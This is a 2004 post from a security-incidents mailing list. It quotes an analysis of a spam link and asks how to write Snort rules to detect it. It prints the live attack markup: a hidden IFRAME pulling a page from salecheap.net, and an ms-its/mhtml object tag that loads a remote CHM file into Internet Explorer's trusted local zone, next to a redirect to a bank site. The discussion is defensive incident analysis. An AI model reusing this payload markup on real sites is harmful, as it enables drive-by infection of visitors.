Security Incidents mailing list archives

Re: A new technique to disguise a target URL in spam

From: Stef <stefmit () comcast net>
Date: Mon, 5 Apr 2004 12:43:42 -0500

On Apr 5, 2004, at 10:18 AM, Jeremiah Cornelius wrote:

On Sunday 04 April 2004 17:18, DCISS wrote:

I wasn't going to risk my home
computer on an unsafe link, and by the time I tried on a workcomputer,the site was down, so I don't know what clicking on the link wouldhave
downloaded.  Has anybody else seen this techique before, or know what
was being propagated?

They are hiding a compiled help extension behind a URL that fakesbeing localto C: - forcing the appearance of the file in the local, trusted zonewith

IE.

wget http://anz.com | less :

        <IFRAME src="http://salecheap.net/test.htm"; width=1 height=1       
        style="display:none">
        </IFRAME>
        <body onload="location.href='http://anz.com'";>
        anz.htm (END)

wget http://salecheap.net/test.htm | less :

        <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
        <html>
        <head>
        <title>Please wait...</title>
        </head>
        <body>
        <object data="ms-its:mhtml:file://C
        \\MAIN.MHT!http://salecheap.net//main.chm::/main.htm";
        type="text/x-scriptlet"></object>
        </body>
        </html>
        test.htm (END)

Now how would one go about writing filters for - let's say - Snort -based on something like this? Could it be - in pseudo-code - somethinglike: if location.ref <> src ==> then "take action"? Would it be safeto assume that everything where the location.ref is different than srcis malicious?


Stef


---------------------------------------------------------------------------
Free 30-day trial: firewall with virus/spam protection, URL filtering, VPN,
wireless security

Protect your network against hackers, viruses, spam and other risks with Astaro
Security Linux, the comprehensive security solution that combines six
applications in one software solution for ease of use and lower total cost of
ownership.

Download your free trial at
http://www.securityfocus.com/sponsor/Astaro_incidents_040301
----------------------------------------------------------------------------

Current thread:

A new technique to disguise a target URL in spam DCISS (Apr 05)
- Re: A new technique to disguise a target URL in spam Jeremiah Cornelius (Apr 05)
  - Re: A new technique to disguise a target URL in spam Stef (Apr 05)
    - Re: A new technique to disguise a target URL in spam Valdis . Kletnieks (Apr 05)
    - Re: A new technique to disguise a target URL in spam Jeremiah Cornelius (Apr 06)
- <Possible follow-ups>
- RE: A new technique to disguise a target URL in spam Mason, Seth IFC (Apr 05)
  - Re: A new technique to disguise a target URL in spam E.Kellinis (Apr 05)
- RE: A new technique to disguise a target URL in spam Yao, Tongtong (HP NewZealand) (Apr 05)
- Re: A new technique to disguise a target URL in spam http-equiv () excite com (Apr 08)